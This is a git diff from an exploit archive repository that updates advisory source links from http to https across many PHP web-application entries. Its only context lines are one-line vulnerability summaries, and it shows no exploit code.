diff --git a/exploits/php/webapps/25175.txt b/exploits/php/webapps/25175.txt index a2a87d5dd..f07826e0f 100644 --- a/exploits/php/webapps/25175.txt +++ b/exploits/php/webapps/25175.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12686/info +source: https://www.securityfocus.com/bid/12686/info Multiple remote input-validation vulnerabilities affect phpCOIN because the application fails to properly sanitize user-supplied input before using it to carry out critical functionality. diff --git a/exploits/php/webapps/25176.txt b/exploits/php/webapps/25176.txt index 0bd39698e..0ccd326e4 100644 --- a/exploits/php/webapps/25176.txt +++ b/exploits/php/webapps/25176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12690/info +source: https://www.securityfocus.com/bid/12690/info PBLang is reported prone to a directory traversal vulnerability. It is reported that the issue exists due to a lack of sufficient sanitization performed on user-supplied input. diff --git a/exploits/php/webapps/25177.txt b/exploits/php/webapps/25177.txt index 96e2a756f..8a803e8df 100644 --- a/exploits/php/webapps/25177.txt +++ b/exploits/php/webapps/25177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12691/info +source: https://www.securityfocus.com/bid/12691/info A remote script injection vulnerability affects CutePHP CuteNews. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. diff --git a/exploits/php/webapps/25178.txt b/exploits/php/webapps/25178.txt index bebf8be13..693c9a4ea 100644 --- a/exploits/php/webapps/25178.txt +++ b/exploits/php/webapps/25178.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12693/info +source: https://www.securityfocus.com/bid/12693/info 427BB is reportedly affected by multiple remote HTML injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25179.txt b/exploits/php/webapps/25179.txt index 8d26c8476..687d5982b 100644 --- a/exploits/php/webapps/25179.txt +++ b/exploits/php/webapps/25179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12694/info +source: https://www.securityfocus.com/bid/12694/info PBLang is reported prone to a vulnerability that can allow a registered user to delete arbitrary personal messages. The vulnerability exists due to a design error leading to a lack of access controls. diff --git a/exploits/php/webapps/25180.py b/exploits/php/webapps/25180.py index 9a5d79672..b381cef63 100755 --- a/exploits/php/webapps/25180.py +++ b/exploits/php/webapps/25180.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12696/info +source: https://www.securityfocus.com/bid/12696/info It is reported that PHPNews is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25183.txt b/exploits/php/webapps/25183.txt index 9ccb398e5..0c0cb1779 100644 --- a/exploits/php/webapps/25183.txt +++ b/exploits/php/webapps/25183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12709/info +source: https://www.securityfocus.com/bid/12709/info ProjectBB is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25184.txt b/exploits/php/webapps/25184.txt index 2ce71f9a3..61f471731 100644 --- a/exploits/php/webapps/25184.txt 
+++ b/exploits/php/webapps/25184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12710/info +source: https://www.securityfocus.com/bid/12710/info ProjectBB is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to the application failing to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25185.txt b/exploits/php/webapps/25185.txt index b654e3bfe..ccdd2e8cc 100644 --- a/exploits/php/webapps/25185.txt +++ b/exploits/php/webapps/25185.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12720/info +source: https://www.securityfocus.com/bid/12720/info D-Forum is reportedly affected by a cross-site scripting vulnerability. This issue is due to the application failing to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25186.txt b/exploits/php/webapps/25186.txt index b379e7129..862f02752 100644 --- a/exploits/php/webapps/25186.txt +++ b/exploits/php/webapps/25186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12721/info +source: https://www.securityfocus.com/bid/12721/info Typo3 'cmw_linklist' extension is affected by a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in a SQL query. diff --git a/exploits/php/webapps/25189.txt b/exploits/php/webapps/25189.txt index f8b0ecb07..eca282ce7 100644 --- a/exploits/php/webapps/25189.txt +++ b/exploits/php/webapps/25189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12726/info +source: https://www.securityfocus.com/bid/12726/info Download Center Lite is reportedly affected by an arbitrary remote PHP file include vulnerability. This issue is due to the application failing to properly sanitize user supplied input. diff --git a/exploits/php/webapps/25192.pl b/exploits/php/webapps/25192.pl index 63941b606..053606cd2 100755 --- a/exploits/php/webapps/25192.pl 
+++ b/exploits/php/webapps/25192.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12735/info +source: https://www.securityfocus.com/bid/12735/info PHP Form Mail Script is prone to remote file include vulnerability. diff --git a/exploits/php/webapps/25193.txt b/exploits/php/webapps/25193.txt index 897759600..95500a940 100644 --- a/exploits/php/webapps/25193.txt +++ b/exploits/php/webapps/25193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12747/info +source: https://www.securityfocus.com/bid/12747/info phpWebLog is prone to remote file include vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include_once()' function call. diff --git a/exploits/php/webapps/25197.txt b/exploits/php/webapps/25197.txt index 1ff88bed8..9dbe388fd 100644 --- a/exploits/php/webapps/25197.txt +++ b/exploits/php/webapps/25197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12751/info +source: https://www.securityfocus.com/bid/12751/info PHP-Fusion is reported prone to a script injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input prior to including it in dynamically generated content. diff --git a/exploits/php/webapps/25199.txt b/exploits/php/webapps/25199.txt index 9be0c5e2e..6c0cf0b1e 100644 --- a/exploits/php/webapps/25199.txt +++ b/exploits/php/webapps/25199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12756/info +source: https://www.securityfocus.com/bid/12756/info A remote cross-site scripting vulnerability affects YaBB. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25200.txt b/exploits/php/webapps/25200.txt index 93d0f6764..0a7c3bfec 100644 --- a/exploits/php/webapps/25200.txt +++ b/exploits/php/webapps/25200.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12758/info +source: https://www.securityfocus.com/bid/12758/info Multiple remote cross-site scripting vulnerabilities affect PHP Arena PaFileDB. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25206.txt b/exploits/php/webapps/25206.txt index dcad05c25..54ecc56ac 100644 --- a/exploits/php/webapps/25206.txt +++ b/exploits/php/webapps/25206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12777/info +source: https://www.securityfocus.com/bid/12777/info Zorum is a freely available, open source Web-based forum application implemented in PHP. It is available for UNIX, Linux, and any other platform that supports PHP script execution. diff --git a/exploits/php/webapps/25208.txt b/exploits/php/webapps/25208.txt index 3cea88321..cdf336340 100644 --- a/exploits/php/webapps/25208.txt +++ b/exploits/php/webapps/25208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12779/info +source: https://www.securityfocus.com/bid/12779/info PhotoPost PHP Pro is a web-based image gallery application written in PHP. It can be implemented on any platform that supports PHP script execution. diff --git a/exploits/php/webapps/25212.txt b/exploits/php/webapps/25212.txt index ce7313b8b..f8c924f2e 100644 --- a/exploits/php/webapps/25212.txt +++ b/exploits/php/webapps/25212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12784/info +source: https://www.securityfocus.com/bid/12784/info It is reported that UBB.threads is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25213.txt b/exploits/php/webapps/25213.txt index f16ebfb3c..9626475a4 100644 --- a/exploits/php/webapps/25213.txt +++ b/exploits/php/webapps/25213.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12788/info +source: https://www.securityfocus.com/bid/12788/info Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts. diff --git a/exploits/php/webapps/25214.txt b/exploits/php/webapps/25214.txt index 7d99e9c8f..55bd4cf94 100644 --- a/exploits/php/webapps/25214.txt +++ b/exploits/php/webapps/25214.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12788/info +source: https://www.securityfocus.com/bid/12788/info Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts. diff --git a/exploits/php/webapps/25215.txt b/exploits/php/webapps/25215.txt index be36118a0..1fad2f921 100644 --- a/exploits/php/webapps/25215.txt +++ b/exploits/php/webapps/25215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12788/info +source: https://www.securityfocus.com/bid/12788/info Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts. diff --git a/exploits/php/webapps/25216.txt b/exploits/php/webapps/25216.txt index deb472c46..e187348af 100644 --- a/exploits/php/webapps/25216.txt +++ b/exploits/php/webapps/25216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12788/info +source: https://www.securityfocus.com/bid/12788/info Multiple SQL injection and cross-site scripting vulnerabilities exist in paFileDB. These issues are reported to exist in the 'viewall.php' and 'category.php' scripts. diff --git a/exploits/php/webapps/25217.html b/exploits/php/webapps/25217.html index 5874a08fa..68702c56f 100644 --- a/exploits/php/webapps/25217.html +++ b/exploits/php/webapps/25217.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12789/info +source: https://www.securityfocus.com/bid/12789/info HolaCMS is prone to a vulnerability that may allow remote users to corrupt files on the server. This is due an input validation error that allows users to submit voting data to an attacker-specified file. diff --git a/exploits/php/webapps/25220.txt b/exploits/php/webapps/25220.txt index 570269d83..becfc238e 100644 --- a/exploits/php/webapps/25220.txt +++ b/exploits/php/webapps/25220.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12796/info +source: https://www.securityfocus.com/bid/12796/info paBox is reportedly affected by a HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25222.html b/exploits/php/webapps/25222.html index 72bcf5af6..515877576 100644 --- a/exploits/php/webapps/25222.html +++ b/exploits/php/webapps/25222.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12799/info +source: https://www.securityfocus.com/bid/12799/info HolaCMS is prone to a vulnerability that may allow remote users to corrupt files on the server. diff --git a/exploits/php/webapps/25223.txt b/exploits/php/webapps/25223.txt index 0c7d5b1ba..36d948815 100644 --- a/exploits/php/webapps/25223.txt +++ b/exploits/php/webapps/25223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12800/info +source: https://www.securityfocus.com/bid/12800/info Phorum is reportedly affected by multiple HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25224.txt b/exploits/php/webapps/25224.txt index 44ec8d4eb..ea361ab25 100644 --- a/exploits/php/webapps/25224.txt +++ b/exploits/php/webapps/25224.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12801/info +source: https://www.securityfocus.com/bid/12801/info SimpGB is reportedly affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'guestbook.php' script before using it in a SQL query. diff --git a/exploits/php/webapps/25225.txt b/exploits/php/webapps/25225.txt index d6342d2d7..e3057fbdb 100644 --- a/exploits/php/webapps/25225.txt +++ b/exploits/php/webapps/25225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12803/info +source: https://www.securityfocus.com/bid/12803/info phpAdsNew is reportedly affected by a remote cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25226.txt b/exploits/php/webapps/25226.txt index 221002618..706e3c833 100644 --- a/exploits/php/webapps/25226.txt +++ b/exploits/php/webapps/25226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12806/info +source: https://www.securityfocus.com/bid/12806/info It is reported that VoteBox is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input to the 'votebox.php' script. diff --git a/exploits/php/webapps/25227.txt b/exploits/php/webapps/25227.txt index 1328a7077..af6d7c73d 100644 --- a/exploits/php/webapps/25227.txt +++ b/exploits/php/webapps/25227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12817/info +source: https://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/25228.txt b/exploits/php/webapps/25228.txt index 42fdd5aa3..c0a1c2302 100644 --- a/exploits/php/webapps/25228.txt +++ b/exploits/php/webapps/25228.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12817/info +source: https://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/25229.txt b/exploits/php/webapps/25229.txt index 4dd09d26c..2d5d7eaa7 100644 --- a/exploits/php/webapps/25229.txt +++ b/exploits/php/webapps/25229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12817/info +source: https://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/25230.txt b/exploits/php/webapps/25230.txt index 1db557c26..175eee636 100644 --- a/exploits/php/webapps/25230.txt +++ b/exploits/php/webapps/25230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12828/info +source: https://www.securityfocus.com/bid/12828/info PunBB is reportedly affected by multiple HTML injection vulnerabilities. diff --git a/exploits/php/webapps/25232.txt b/exploits/php/webapps/25232.txt index 9da014794..f3f326ac1 100644 --- a/exploits/php/webapps/25232.txt +++ b/exploits/php/webapps/25232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12835/info +source: https://www.securityfocus.com/bid/12835/info mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script. diff --git a/exploits/php/webapps/25235.txt b/exploits/php/webapps/25235.txt index fb479fd4f..212a8f07a 100644 --- a/exploits/php/webapps/25235.txt +++ b/exploits/php/webapps/25235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12839/info +source: https://www.securityfocus.com/bid/12839/info Subdreamer is prone to an SQL injection vulnerability. diff --git a/exploits/php/webapps/25236.html b/exploits/php/webapps/25236.html index 79e0ee4bb..8df89a2fb 100644 --- a/exploits/php/webapps/25236.html 
+++ b/exploits/php/webapps/25236.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12841/info +source: https://www.securityfocus.com/bid/12841/info PHPOpenChat is reportedly affected by multiple remote HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/25237.txt b/exploits/php/webapps/25237.txt index d7640b95e..e47dc21f3 100644 --- a/exploits/php/webapps/25237.txt +++ b/exploits/php/webapps/25237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12848/info +source: https://www.securityfocus.com/bid/12848/info RunCMS is reportedly affected by an information disclosure vulnerability. This issue is due to a failure in the application to secure sensitive information. diff --git a/exploits/php/webapps/25239.txt b/exploits/php/webapps/25239.txt index d529cd6cc..ceb18497f 100644 --- a/exploits/php/webapps/25239.txt +++ b/exploits/php/webapps/25239.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12852/info +source: https://www.securityfocus.com/bid/12852/info Multiple remote input validation vulnerabilities affect CoolForum. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. diff --git a/exploits/php/webapps/25240.txt b/exploits/php/webapps/25240.txt index 1c30d57aa..a4df11fbe 100644 --- a/exploits/php/webapps/25240.txt +++ b/exploits/php/webapps/25240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12852/info +source: https://www.securityfocus.com/bid/12852/info Multiple remote input validation vulnerabilities affect CoolForum. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. 
diff --git a/exploits/php/webapps/25241.html b/exploits/php/webapps/25241.html index 77e76873b..e59a00e6a 100644 --- a/exploits/php/webapps/25241.html +++ b/exploits/php/webapps/25241.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12853/info +source: https://www.securityfocus.com/bid/12853/info PHP-Fusion is reportedly affected by a HTML injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input passed to the 'setuser.php' script before using it in dynamically generated content. diff --git a/exploits/php/webapps/25242.txt b/exploits/php/webapps/25242.txt index 476559bff..961a8fec3 100644 --- a/exploits/php/webapps/25242.txt +++ b/exploits/php/webapps/25242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12854/info +source: https://www.securityfocus.com/bid/12854/info Ciamos is reported prone to a file disclosure vulnerability. The full scope of this vulnerability is not currently known, however, it is demonstrated that this issue may be leveraged to disclose the source of PHP files contained in a Ciamos installation. diff --git a/exploits/php/webapps/25243.txt b/exploits/php/webapps/25243.txt index 72c9d8c34..7b9f2b35c 100644 --- a/exploits/php/webapps/25243.txt +++ b/exploits/php/webapps/25243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12855/info +source: https://www.securityfocus.com/bid/12855/info A remote file include vulnerability affects TRG News. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. diff --git a/exploits/php/webapps/25244.txt b/exploits/php/webapps/25244.txt index 3cac6144f..152d05c97 100644 --- a/exploits/php/webapps/25244.txt +++ b/exploits/php/webapps/25244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12857/info +source: https://www.securityfocus.com/bid/12857/info CzarNews is prone to a remote file-include vulnerability. 
diff --git a/exploits/php/webapps/25257.txt b/exploits/php/webapps/25257.txt index cd879a506..8583c24e7 100644 --- a/exploits/php/webapps/25257.txt +++ b/exploits/php/webapps/25257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12868/info +source: https://www.securityfocus.com/bid/12868/info Kayako ESupport is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25258.txt b/exploits/php/webapps/25258.txt index 2279d8fbb..5303ad866 100644 --- a/exploits/php/webapps/25258.txt +++ b/exploits/php/webapps/25258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12869/info +source: https://www.securityfocus.com/bid/12869/info A remote HTTP response splitting vulnerability reportedly affects Phorum. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25260.txt b/exploits/php/webapps/25260.txt index 7e3d640a5..5bc020573 100644 --- a/exploits/php/webapps/25260.txt +++ b/exploits/php/webapps/25260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12878/info +source: https://www.securityfocus.com/bid/12878/info Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/25261.txt b/exploits/php/webapps/25261.txt index 664f885ae..a3badda23 100644 --- a/exploits/php/webapps/25261.txt +++ b/exploits/php/webapps/25261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12878/info +source: https://www.securityfocus.com/bid/12878/info Vortex Portal is reportedly affected by a remote PHP file include vulnerability. This issue is due to a failure in the application to properly sanitize user supplied input. diff --git a/exploits/php/webapps/25262.txt b/exploits/php/webapps/25262.txt index 08ebf3506..2d5f2bfea 100644 --- a/exploits/php/webapps/25262.txt +++ b/exploits/php/webapps/25262.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12879/info +source: https://www.securityfocus.com/bid/12879/info Interspire ArticleLive 2005 is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25263.txt b/exploits/php/webapps/25263.txt index 1ed9f638c..bc2626c9c 100644 --- a/exploits/php/webapps/25263.txt +++ b/exploits/php/webapps/25263.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12883/info +source: https://www.securityfocus.com/bid/12883/info DigitalHive is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25264.txt b/exploits/php/webapps/25264.txt index 497326cc9..7d65a6645 100644 --- a/exploits/php/webapps/25264.txt +++ b/exploits/php/webapps/25264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12883/info +source: https://www.securityfocus.com/bid/12883/info DigitalHive is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25265.txt b/exploits/php/webapps/25265.txt index 11a678915..dbbbbb23f 100644 --- a/exploits/php/webapps/25265.txt +++ b/exploits/php/webapps/25265.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12887/info +source: https://www.securityfocus.com/bid/12887/info phpSysInfo is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25266.txt b/exploits/php/webapps/25266.txt index 3cb58fe6d..df4f6c479 100644 --- a/exploits/php/webapps/25266.txt +++ b/exploits/php/webapps/25266.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12887/info +source: https://www.securityfocus.com/bid/12887/info phpSysInfo is reportedly affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25267.txt b/exploits/php/webapps/25267.txt index c267c4bb8..4edf3f86e 100644 --- a/exploits/php/webapps/25267.txt +++ b/exploits/php/webapps/25267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12888/info +source: https://www.securityfocus.com/bid/12888/info Invision Power Board is reported prone to an HTML injection vulnerability. This issue arises due to insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/25270.txt b/exploits/php/webapps/25270.txt index 656b2621c..62198ff58 100644 --- a/exploits/php/webapps/25270.txt +++ b/exploits/php/webapps/25270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12893/info +source: https://www.securityfocus.com/bid/12893/info Topic Calendar is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25271.txt b/exploits/php/webapps/25271.txt index 9be405b70..0db039680 100644 --- a/exploits/php/webapps/25271.txt +++ b/exploits/php/webapps/25271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12894/info +source: https://www.securityfocus.com/bid/12894/info Double Choco Latte is reported prone to multiple vulnerabilities. These issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting/HTML injection attacks and execute arbitrary PHP code on a computer. diff --git a/exploits/php/webapps/25272.txt b/exploits/php/webapps/25272.txt index 0dbc00b6c..21df2edda 100644 --- a/exploits/php/webapps/25272.txt +++ b/exploits/php/webapps/25272.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12895/info +source: https://www.securityfocus.com/bid/12895/info Koobi CMS is reportedly affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25273.txt b/exploits/php/webapps/25273.txt index b4aa7a7f8..94e9dd86f 100644 --- a/exploits/php/webapps/25273.txt +++ b/exploits/php/webapps/25273.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12896/info +source: https://www.securityfocus.com/bid/12896/info Koobi CMS is reportedly affected by a SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in as SQL query. diff --git a/exploits/php/webapps/25276.txt b/exploits/php/webapps/25276.txt index 5e8cadf94..39b587f0d 100644 --- a/exploits/php/webapps/25276.txt +++ b/exploits/php/webapps/25276.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12900/info +source: https://www.securityfocus.com/bid/12900/info phpMyDirectory is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25278.sh b/exploits/php/webapps/25278.sh index d2439d9ae..5be092295 100755 --- a/exploits/php/webapps/25278.sh +++ b/exploits/php/webapps/25278.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12903/info +source: https://www.securityfocus.com/bid/12903/info ESMI PayPal Storefront is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in as SQL query. diff --git a/exploits/php/webapps/25279.txt b/exploits/php/webapps/25279.txt index 80e57bae2..bf9b55a7e 100644 --- a/exploits/php/webapps/25279.txt +++ b/exploits/php/webapps/25279.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12903/info +source: https://www.securityfocus.com/bid/12903/info ESMI PayPal Storefront is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in as SQL query. diff --git a/exploits/php/webapps/25280.txt b/exploits/php/webapps/25280.txt index cd856eced..2d5b98916 100644 --- a/exploits/php/webapps/25280.txt +++ b/exploits/php/webapps/25280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12904/info +source: https://www.securityfocus.com/bid/12904/info ESMI PayPal Storefrom is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25282.txt b/exploits/php/webapps/25282.txt index 5a4767d7f..c95ae8b8f 100644 --- a/exploits/php/webapps/25282.txt +++ b/exploits/php/webapps/25282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12906/info +source: https://www.securityfocus.com/bid/12906/info Nuke Bookmarks is prone to a path disclosure issue when invalid data is submitted. diff --git a/exploits/php/webapps/25283.txt b/exploits/php/webapps/25283.txt index 7767eaf4a..0b8177043 100644 --- a/exploits/php/webapps/25283.txt +++ b/exploits/php/webapps/25283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12907/info +source: https://www.securityfocus.com/bid/12907/info Nuke Bookmarks is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/25284.txt b/exploits/php/webapps/25284.txt index c4357e705..c50020ed0 100644 --- a/exploits/php/webapps/25284.txt +++ b/exploits/php/webapps/25284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12908/info +source: https://www.securityfocus.com/bid/12908/info Nuke Bookmarks is prone to an SQL injection vulnerability. 
diff --git a/exploits/php/webapps/25285.txt b/exploits/php/webapps/25285.txt index 64df1a98c..6625905e6 100644 --- a/exploits/php/webapps/25285.txt +++ b/exploits/php/webapps/25285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12909/info +source: https://www.securityfocus.com/bid/12909/info MagicScripts E-Store Kit-2 PayPal Edition is prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/25286.txt b/exploits/php/webapps/25286.txt index 5bb503265..29d10e953 100644 --- a/exploits/php/webapps/25286.txt +++ b/exploits/php/webapps/25286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12910/info +source: https://www.securityfocus.com/bid/12910/info MagicScripts E-Store Kit-2 PayPal Edition is prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25299.txt b/exploits/php/webapps/25299.txt index 2fab73c1b..42ad55471 100644 --- a/exploits/php/webapps/25299.txt +++ b/exploits/php/webapps/25299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12914/info +source: https://www.securityfocus.com/bid/12914/info Tkai's Shoutbox is reported prone to a remote URI redirection vulnerability. diff --git a/exploits/php/webapps/25300.txt b/exploits/php/webapps/25300.txt index 7dd4df68b..f313214d5 100644 --- a/exploits/php/webapps/25300.txt +++ b/exploits/php/webapps/25300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12915/info +source: https://www.securityfocus.com/bid/12915/info Multiple input validation vulnerabilities reportedly affect exoops. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions. diff --git a/exploits/php/webapps/25301.txt b/exploits/php/webapps/25301.txt index 148419898..8e519b502 100644 --- a/exploits/php/webapps/25301.txt +++ b/exploits/php/webapps/25301.txt 
